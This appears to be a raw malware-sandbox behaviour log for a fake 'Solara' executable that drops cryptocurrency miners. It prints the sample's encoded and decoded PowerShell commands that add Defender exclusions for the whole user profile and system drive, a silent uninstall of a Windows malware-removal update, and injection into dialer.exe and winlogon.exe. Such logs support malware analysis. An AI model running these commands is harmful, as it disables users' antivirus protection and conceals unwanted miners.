Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Process created: Base64 decoded <#iub#>Add-MpPreference <#vqw#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#dmx#> -Force <#bfi#>
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Process created: Base64 decoded <#dpt#>Add-MpPreference <#apt#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#njg#> -Force <#hnq#>
Source: C:\Users\user\Desktop\Solara.exe | Process created: Base64 decoded <#pxn#>Add-MpPreference <#ayf#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#gae#> -Force <#wep#>
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Process created: Base64 decoded <#iub#>Add-MpPreference <#vqw#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#dmx#> -Force <#bfi#>
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Process created: Base64 decoded <#dpt#>Add-MpPreference <#apt#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#njg#> -Force <#hnq#>
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Memory written: C:\Windows\System32\dialer.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1E858950000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\eth.exe | Thread register set: target process: 5236
Source: C:\Users\user\AppData\Local\Temp\xmr.exe | Thread register set: target process: 2700
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Thread register set: target process: 8032
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Thread register set: target process: 8048
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Memory written: C:\Windows\System32\dialer.exe base: 140000000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1E858950000
Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAeABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAeQBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAYQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAZQBwACMAPgA="
Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Users\user\AppData\Local\Temp\eth.exe "C:\Users\user\AppData\Local\Temp\eth.exe"
Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Users\user\AppData\Local\Temp\xmr.exe "C:\Users\user\AppData\Local\Temp\xmr.exe"
Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe "C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe"
Source: C:\Users\user\AppData\Local\Temp\eth.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\AppData\Local\Temp\xmr.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA="
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Process created: C:\Users\user\AppData\Local\Temp\kx new.exe "C:\Users\user\AppData\Local\Temp\kx new.exe"
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Process created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Process created: C:\Users\user\AppData\Local\Temp\Kawpow new.exe "C:\Users\user\AppData\Local\Temp\Kawpow new.exe"
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Process created: C:\Users\user\AppData\Local\Temp\xmr new.exe "C:\Users\user\AppData\Local\Temp\xmr new.exe"
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajahaaeabuacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajageaeqbmacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagcayqblacmapgagac0argbvahiaywblacaapaajahcazqbwacmapga="
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagkadqbiacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahyacqb3acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagqabqb4acmapgagac0argbvahiaywblacaapaajagiazgbpacmapga="
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagqacab0acmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajageacab0acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajag4aagbnacmapgagac0argbvahiaywblacaapaajaggabgbxacmapga="
Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajahaaeabuacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajageaeqbmacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagcayqblacmapgagac0argbvahiaywblacaapaajahcazqbwacmapga="
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagkadqbiacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahyacqb3acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagqabqb4acmapgagac0argbvahiaywblacaapaajagiazgbpacmapga="
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagqacab0acmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajageacab0acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajag4aagbnacmapgagac0argbvahiaywblacaapaajaggabgbxacmapga="
Source: C:\Windows\System32\dialer.exe | Code function: 51_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,51_2_0000000140001B54
Source: C:\Windows\System32\dialer.exe | Code function: 51_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,51_2_0000000140001B54
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Code function: 19_2_0000027E823336F0 cpuid 19_2_0000027E823336F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
